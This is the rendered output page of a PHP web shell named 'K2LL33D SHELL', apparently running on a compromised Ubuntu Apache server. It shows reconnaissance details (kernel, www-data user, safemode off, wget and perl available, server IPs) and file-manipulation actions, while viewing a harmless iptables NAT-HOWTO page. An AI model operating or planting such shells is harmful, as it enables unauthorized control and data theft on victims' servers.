K2LL33D SHELL

 Apache/2.4.7 (Ubuntu)
 Linux sman1baleendah 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 safemode : OFF
 MySQL: ON | Perl: ON | cURL: OFF | WGet: ON
  >  / usr / share / doc / iptables / html / 		server ip : 172.67.156.115

your ip : 108.162.241.149

H O M E


Filename/usr/share/doc/iptables/html/NAT-HOWTO-8.html
Size1.04 kb
Permissionrw-r--r--
Ownerroot : root
Create time27-Apr-2025 09:55
Last modified09-Jan-2014 06:31
Last accessed07-Jul-2025 07:30
Actionsedit | rename | delete | download (gzip)
Viewtext | code | image
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<META NAME="GENERATOR" CONTENT="LinuxDoc-Tools 0.9.69">
<TITLE>Linux 2.4 NAT HOWTO: Caveats on NAT</TITLE>
<LINK HREF="NAT-HOWTO-9.html" REL=next>
<LINK HREF="NAT-HOWTO-7.html" REL=previous>
<LINK HREF="NAT-HOWTO.html#toc8" REL=contents>
</HEAD>
<BODY>
<A HREF="NAT-HOWTO-9.html">Next</A>
<A HREF="NAT-HOWTO-7.html">Previous</A>
<A HREF="NAT-HOWTO.html#toc8">Contents</A>
<HR>
<H2><A NAME="s8">8.</A> <A HREF="NAT-HOWTO.html#toc8">Caveats on NAT</A></H2>

<P>If you are doing NAT on a connection, all packets passing
<B>both</B> ways (in and out of the network) must pass through the
NAT'ed box, otherwise it won't work reliably. In particular, the
connection tracking code reassembles fragments, which means that not
only will connection tracking not be reliable, but your packets may
not get through at all, as fragments will be withheld.</P>

<HR>
<A HREF="NAT-HOWTO-9.html">Next</A>
<A HREF="NAT-HOWTO-7.html">Previous</A>
<A HREF="NAT-HOWTO.html#toc8">Contents</A>
</BODY>
</HTML>